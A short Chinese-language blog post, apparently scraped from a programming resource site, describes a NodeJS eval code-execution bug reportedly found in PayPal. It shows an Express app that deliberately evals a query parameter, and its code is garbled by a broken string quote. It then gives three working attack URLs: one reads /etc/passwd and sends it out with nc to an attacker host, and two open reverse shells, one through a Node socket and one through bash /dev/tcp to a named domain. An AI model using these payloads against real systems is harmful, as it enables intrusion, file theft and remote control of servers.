背景@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。
测试var express = require("express"); var app = express(); app.get("/", function (req, res) { res.send("Hello eval(req.query.q));console.log(req.query.q);});app.listen(8080, function () { console.log("Example listening on port 8080!");});任意文件读取
http://host:8080/?q=require("child_process").exec("cat+/etc/passwd+|+nc+attackerip+80")
GET SHELL
http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});GET SHELL2
http://host:8080/?q=require("child_process").exec("bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"")
易网时代-编程资源站